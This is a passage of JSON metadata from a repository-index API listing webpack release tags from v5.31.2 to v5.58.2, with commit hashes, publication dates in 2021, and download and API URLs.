"tag","published_at":"2021-10-13T09:39:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.58.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.58.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.58.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.2/manifests"},{"name":"v5.58.1","sha":"2eecffb2739d13d3095568d118ffc0baacec5cd8","kind":"tag","published_at":"2021-10-08T13:41:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.58.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.58.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.58.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.1/manifests"},{"name":"v5.58.0","sha":"7666277551be32947227e80fb2fccdbbe656254b","kind":"tag","published_at":"2021-10-07T15:48:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.58.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.58.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.58.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.0/manifests"},{"name":"v5.57.1","sha":"0581bb3c1c32bcb3e182a0f732b862a6c5bb7846","kind":"tag","published_at":"2021-10-05T18:25:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.57.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.57.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.57.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.1/manifests"},{"name":"v5.57.0","sha":"e841ab01417f8e1dd6a2533638f848b5ad0c7d16","kind":"tag","published_at":"2021-10-05T15:06:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.57.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.57.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.57.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.0/manifests"},{"name":"v5.56.1","sha":"ed55e200efb0dad7716d509c82a6ed82aee86c51","kind":"tag","published_at":"2021-10-04T07:32:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.56.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.56.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.56.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.1/manifests"},{"name":"v5.56.0","sha":"4eb122092d9696ac5286bc2dcf3eacfb901f4fed","kind":"tag","published_at":"2021-10-01T14:12:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.56.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.56.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.56.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.0/manifests"},{"name":"v5.55.1","sha":"e78403d6a8d4e682fbd4a0eb58f042866cfde42a","kind":"tag","published_at":"2021-09-29T08:56:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.55.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.55.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.55.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.1/manifests"},{"name":"v5.55.0","sha":"5db30851c7ed007d8f94150ee2c6a1b47d10d388","kind":"tag","published_at":"2021-09-28T17:39:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.55.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.55.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.55.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.0/manifests"},{"name":"v5.54.0","sha":"45829826701ff6582ea16bc36376d105ff264c26","kind":"tag","published_at":"2021-09-24T19:07:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.54.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.54.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.54.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.54.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.54.0/manifests"},{"name":"v5.53.0","sha":"6796b73a1ab83739f0e722d914676c9dd58d65e2","kind":"tag","published_at":"2021-09-16T13:52:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.53.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.53.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.53.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.53.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.53.0/manifests"},{"name":"v5.52.1","sha":"d95a0418b64bd366f0c51f2635ef0c24158b8bce","kind":"tag","published_at":"2021-09-10T08:55:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.52.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.52.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.52.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.1/manifests"},{"name":"v5.52.0","sha":"4edd3800567f279edd7091af14b3385552a8972f","kind":"tag","published_at":"2021-09-03T15:27:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.52.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.52.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.52.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.0/manifests"},{"name":"v5.51.2","sha":"684e22ec4d6e6221de8a4a8a6b3b8f37b863a09d","kind":"tag","published_at":"2021-09-02T13:24:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.51.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.51.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.51.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.2/manifests"},{"name":"v5.51.1","sha":"d3da48e7e3da3042b7142fe3deced0bcaac3e704","kind":"tag","published_at":"2021-08-19T14:16:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.51.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.51.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.51.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.1/manifests"},{"name":"v5.51.0","sha":"bd7cb37f1c0d872cfff9fc27c7db52a25e1ba6a3","kind":"tag","published_at":"2021-08-19T09:04:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.51.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.51.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.51.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.0/manifests"},{"name":"v5.50.0","sha":"400a0f94ab45ca20b10f219c8311e87d3d3f108c","kind":"tag","published_at":"2021-08-10T18:31:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.50.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.50.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.50.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.50.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.50.0/manifests"},{"name":"v5.49.0","sha":"d3868384c37f9d674d1db17a0198393bd213c763","kind":"tag","published_at":"2021-08-06T11:07:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.49.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.49.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.49.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.49.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.49.0/manifests"},{"name":"v5.48.0","sha":"67f3aef3c11e2a8d9e7dc1e0300350588ebd7aec","kind":"tag","published_at":"2021-08-02T12:36:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.48.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.48.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.48.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.48.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.48.0/manifests"},{"name":"v5.47.1","sha":"3f353b6ae29ae6d96e0ab86e7233b4c785f99c60","kind":"tag","published_at":"2021-07-29T14:19:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.47.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.47.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.47.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.1/manifests"},{"name":"v5.47.0","sha":"efeb1287e52870036cc01b22476852205e99c31a","kind":"tag","published_at":"2021-07-27T14:27:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.47.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.47.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.47.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.0/manifests"},{"name":"v5.46.0","sha":"a32b0fd041260f3303b9329c9a65cc4afe102390","kind":"tag","published_at":"2021-07-22T10:14:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.46.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.46.0/manifests"},{"name":"v5.45.1","sha":"7102df3bb52a33529ff5db4fdf34484d2a359a49","kind":"tag","published_at":"2021-07-16T20:09:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.45.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.45.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.45.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.1/manifests"},{"name":"v5.45.0","sha":"db52c58a4fb037ece22be6365f56c11bc78fb426","kind":"tag","published_at":"2021-07-16T15:50:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.45.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.0/manifests"},{"name":"v5.44.0","sha":"f20158d4492e73d07a36cd1614dfbd1dc1ea143d","kind":"tag","published_at":"2021-07-08T19:37:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.44.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.44.0/manifests"},{"name":"v5.43.0","sha":"b53a06437a3e8b2756c550c1be6ccb33fdba03d7","kind":"tag","published_at":"2021-07-06T19:07:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.43.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.43.0/manifests"},{"name":"v5.42.1","sha":"4156b20644d309c0e8acaa1e22ca3a4fe546c0b6","kind":"tag","published_at":"2021-07-05T14:05:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.42.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.1/manifests"},{"name":"v5.42.0","sha":"4fb45402eec7efe1c70e641cab7b24331948ea8d","kind":"tag","published_at":"2021-07-02T07:04:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.42.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.0/manifests"},{"name":"v5.41.1","sha":"9ed05afbeaf87442d86863a20a6c30b0ab437fb5","kind":"tag","published_at":"2021-06-29T14:30:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.41.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.1/manifests"},{"name":"v5.41.0","sha":"fd5dc9997671b4c4b32d15f722e06079cd5da2db","kind":"tag","published_at":"2021-06-28T16:23:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.41.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.0/manifests"},{"name":"v5.40.0","sha":"5d297327bc1f208de16c29f5c9b31d2b8a06bce4","kind":"tag","published_at":"2021-06-21T16:25:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.40.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.40.0/manifests"},{"name":"v5.39.1","sha":"e5ccd070f6c18794173d3f2e60445de5bc2f52a2","kind":"tag","published_at":"2021-06-17T10:21:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.39.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.1/manifests"},{"name":"v5.39.0","sha":"e9f90450d5d8b4e796e5e0e9674869220ab73bcb","kind":"tag","published_at":"2021-06-14T21:31:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.39.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.0/manifests"},{"name":"v5.38.1","sha":"487665cb69f7b1f1aac44097124ef8f33cfe247b","kind":"tag","published_at":"2021-05-27T21:12:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.38.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.38.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.38.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.1/manifests"},{"name":"v5.38.0","sha":"daa0f1ed1cebc28c8cc9034f95f3b56e9253ec5e","kind":"tag","published_at":"2021-05-27T12:41:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.38.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.0/manifests"},{"name":"v5.37.1","sha":"2a5ed4a2dcbe06e852f84a8e7f63145af87cb139","kind":"tag","published_at":"2021-05-19T06:50:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.37.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.1/manifests"},{"name":"v5.37.0","sha":"a5821c74568d59a330043900328a018c5d3a4af7","kind":"tag","published_at":"2021-05-10T16:21:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.37.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.0/manifests"},{"name":"v5.36.2","sha":"0e2e972a2d181c530bb7185278fe5cfc20724c22","kind":"tag","published_at":"2021-04-30T11:48:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.36.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.36.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.36.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.2/manifests"},{"name":"v5.36.1","sha":"e9de77aae42bd8f7d799a21dd16c98206cd170f6","kind":"tag","published_at":"2021-04-28T18:57:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.36.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.1/manifests"},{"name":"v5.36.0","sha":"c0a3394ae059ba30c90b7e84c3805dcfd918577d","kind":"tag","published_at":"2021-04-27T09:44:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.36.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.0/manifests"},{"name":"v5.35.1","sha":"ed175cd22f89eb9fecd0a70572a3fd0be028e77c","kind":"tag","published_at":"2021-04-23T18:36:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.35.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.1/manifests"},{"name":"v5.35.0","sha":"e05935f8969d873a20762767d348256e5ad8fb46","kind":"tag","published_at":"2021-04-21T06:37:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.35.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.0/manifests"},{"name":"v5.34.0","sha":"a52263b4537dc5bd954677fc884966b0c11114d4","kind":"tag","published_at":"2021-04-19T14:42:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.34.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.34.0/manifests"},{"name":"v5.33.2","sha":"93ce24d2dc40ee972a2ea5138f3c181563c913fd","kind":"tag","published_at":"2021-04-14T18:31:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.33.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.33.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.33.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.2/manifests"},{"name":"v5.33.1","sha":"7a7d3be25a3db94cb47923d122513726966025cf","kind":"tag","published_at":"2021-04-14T18:08:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.33.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.33.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.33.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.1/manifests"},{"name":"v5.33.0","sha":"7ee3bab88a5f38d4a6356baf93a8c9dfb901b9dc","kind":"tag","published_at":"2021-04-14T17:28:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.33.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.0/manifests"},{"name":"v5.32.0","sha":"932950550c85dce4efcaccd7116b4879bfd5f962","kind":"tag","published_at":"2021-04-12T18:54:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.32.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.32.0/manifests"},{"name":"v5.31.2","sha":"cde1b73e12eb8a77eb9ba42e7920c9ec5d29c2c9","kind":"tag","published_at":"2021-04-09T17:52:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.31.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.31.2","dependencies_parsed_at":null,"dependenc